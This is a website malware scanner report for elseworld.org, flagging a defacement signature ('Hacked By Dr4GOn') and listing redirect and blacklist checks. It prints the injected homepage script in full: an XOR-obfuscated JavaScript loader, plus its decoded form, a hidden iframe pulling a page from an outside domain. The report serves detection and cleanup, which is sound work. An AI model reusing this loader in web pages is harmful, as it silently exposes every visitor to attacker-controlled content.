New scan:

Malware Scanner report for elseworld.org

Malicious/Suspicious/Total urls checked
0/1/2
1 page has suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked By Dr4GOn  (25 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://elseworld.org/
200 OK
Content-Length: 11983
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

var enkripsi="'02'02'02'02'1Akdpcog'02qpa'1F'00jvvr'1C--`cn{cl,kp-fgom-pf,jvon'00'02qapmnnkle'1F'00lm'00'02jgkejv'1F'00332'07'00'02ukfvj'1F'00322'07'00'02kf'1F'00dpo'00'1G'1A-kdpcog'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);

Decoded script:


<iframe src="http://balyan.ir/demo/rd.html" scrolling="no" height="110%" width="100%" id="frm"></iframe>

Deface/Content modification. The following signature was found: Hacked By Dr4GOn

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<title>Hacked By Dr4GOn</title>
<style>
#frm{
border:none;
overflow:no-content;
position:absolute;
top:0;
left:0;
z-index:-100;
}
.wrapper{
width:100%;
height:100%;
background:transparent;
position:absolute;
z-index:-99;
top:0;
...[13399 bytes skipped]...


http://elseworld.org/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: elseworld.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 15 Dec 2015 16:16:31 GMT
Accept-Ranges: bytes
ETag: "2ecf-45d7685d9a500"
Server: Apache
Vary: Accept-Encoding
Content-Length: 11983
Content-Type: text/html
Last-Modified: Sun, 07 Dec 2008 15:25:40 GMT
X-Pad: avoid browser bug

...11983 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: elseworld.org
Referer: http://www.google.com/search?q=elseworld.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=elseworld.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://elseworld.org/

Result: elseworld.org is not infected or malware details are not published yet.